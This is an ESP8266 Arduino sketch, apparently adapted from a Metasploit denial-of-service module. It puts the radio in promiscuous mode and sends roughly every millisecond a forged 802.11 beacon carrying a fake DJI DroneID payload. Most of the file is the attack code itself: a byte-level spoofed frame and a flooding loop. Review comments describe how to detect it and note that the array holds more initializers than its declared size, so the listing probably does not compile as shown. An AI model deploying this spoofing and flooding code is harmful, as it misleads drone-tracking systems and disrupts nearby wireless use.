ESP8266_DJI_DroneID_Throwie.ino
// original code - https://gist.githubusercontent.com/kost/1e1b13d5796a6649f82ec1c08cd0a835/raw/81b0299a30c36e77f46e57eab8bcd03f77ceb39a/esp8266-wifi-beacon-generator.ino
// esp8266-wifi-beacon-generator by Kost - https://github.com/kost
#include <ESP8266WiFi.h>
extern "C" {
#include "user_interface.h"
}
// bytes derived from: https://github.com/DJISDKUser/metasploit-framework/blob/62e36f1b5c6cae0abed9c86c769bd1656931061c/modules/auxiliary/dos/wifi/droneid.rb#L187
/*
 * wifipkt: constant byte template of an 802.11 beacon frame (type/subtype
 * 0x80) that loop() passes to wifi_send_pkt_freedom().
 *
 * Every field is hard-coded: broadcast destination, source and BSSID
 * 01:02:03:04:05:06, SSID "ABCDEFABCDEF", channel 11, followed by tagged
 * elements. The last element is vendor specific (tag 0xdd, OUI bytes
 * 26 37 12) and carries the fixed DroneID sample referenced below.
 *
 * Characteristics visible in these bytes that a monitoring or detection rule
 * can key on:
 *  - the source/BSSID first octet is 0x01, i.e. the group (multicast) bit is
 *    set, which is not valid for an individual transmitter address;
 *  - the timestamp field is the fixed pattern 01..08 (as listed here; whether
 *    the radio rewrites it on transmit is not shown);
 *  - the DroneID payload is identical in every frame and contains the ASCII
 *    strings "DroneID is crap!" and "195741".
 *
 * NOTE(review): the initializer lists more than 128 values although the array
 * is declared with 128 elements and loop() passes a length of 128. A C++
 * compiler is expected to reject the excess initializers, and a length of 128
 * does not cover the later elements. Read the listing as a description of the
 * frame layout, not as an exact record of what is transmitted.
 */
byte wifipkt[128] = {
0x80, // type/subtype
0x00, // flags
0x00, 0x00, // duration
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // dst (broadcast)
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // src (placeholder address, group bit set)
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // bssid (same placeholder as src)
0x01, 0x02, // seq
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, // timestamp value
0x64, 0x00, // beacon interval
0x00, 0x05, // capability flags
// SSID element: tag 0x00, length 0x0c, then 12 bytes of ASCII "ABCDEFABCDEF"
0x00, 0x0c, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46,
// supported rates
0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24,
// current channel (tag 0x03, length 1, value 0x0b = 11)
0x03, 0x01, 0x0b,
// traffic indication map
0x05, 0x04, 0x00, 0x01, 0x00, 0x00,
// country information (0x55 0x53 = ASCII "US")
0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e,
// erp information
0x2a, 0x01, 0x00,
// extended supported rates
0x32, 0x04, 0x30, 0x48, 0x60, 0x6c,
// HT Capabilities
0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// HT Information
0x3d, 0x16, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// RSN Information
0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00,
// Vendor Specific: Microsoft WMM/WME Parameter Element
0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00,
// fixedDroneID sample - https://github.com/DJISDKUser/metasploit-framework/blob/62e36f1b5c6cae0abed9c86c769bd1656931061c/modules/auxiliary/dos/wifi/droneid.rb#L93
// Vendor-specific element: tag 0xdd, length 0x52, OUI bytes 26 37 12, then a constant payload.
0xdd, 0x52, 0x26, 0x37, 0x12, 0x58, 0x62, 0x13, 0x10, 0x01, 0x5a, 0x00, 0xd7, 0x0f, 0x44, 0x72, 0x6f, 0x6e, 0x65, 0x49, 0x44, 0x20, 0x69, 0x73, 0x20, 0x63, 0x72, 0x61, 0x70, 0x21, 0xb0, 0x78, 0x5b, 0x00, 0x29, 0xeb, 0xc2, 0xfe, 0xf6, 0x00, 0xd3, 0x00, 0xd8, 0x00, 0xab, 0x00, 0x3b, 0x00, 0xc0, 0x00, 0xf4, 0x00, 0x40, 0x00, 0x0c, 0x05, 0x3c, 0x00, 0x30, 0x79, 0x2f, 0x01, 0x10, 0x06, 0x31, 0x39, 0x35, 0x37, 0x34, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
// One-time radio setup, run once at boot by the Arduino core: pause briefly,
// select station mode, then switch the radio into promiscuous mode.
void setup() {
  const unsigned long startup_delay_ms = 500;  // settle time before touching the radio

  delay(startup_delay_ms);
  wifi_set_opmode(STATION_MODE);
  wifi_promiscuous_enable(1);  // 1 = enable
}
// Called repeatedly by the Arduino core: hands the wifipkt template to the SDK
// raw-frame call, then pauses for 1 ms. The call's result is discarded.
//
// For monitoring: the template advertises a beacon interval of 0x64, while
// this loop attempts a send roughly every millisecond, so the observed beacon
// rate from a device running this sketch would presumably be far above the
// interval the frame itself claims.
void loop() {
  // http://espressif.com/sites/default/files/documentation/2c-esp8266_non_os_sdk_api_reference_en.pdf
  const int frame_len = 128;         // byte count passed to the SDK
  const bool use_system_seq = true;  // third argument (sys_seq in the SDK reference)

  wifi_send_pkt_freedom(wifipkt, frame_len, use_system_seq);
  delay(1);
}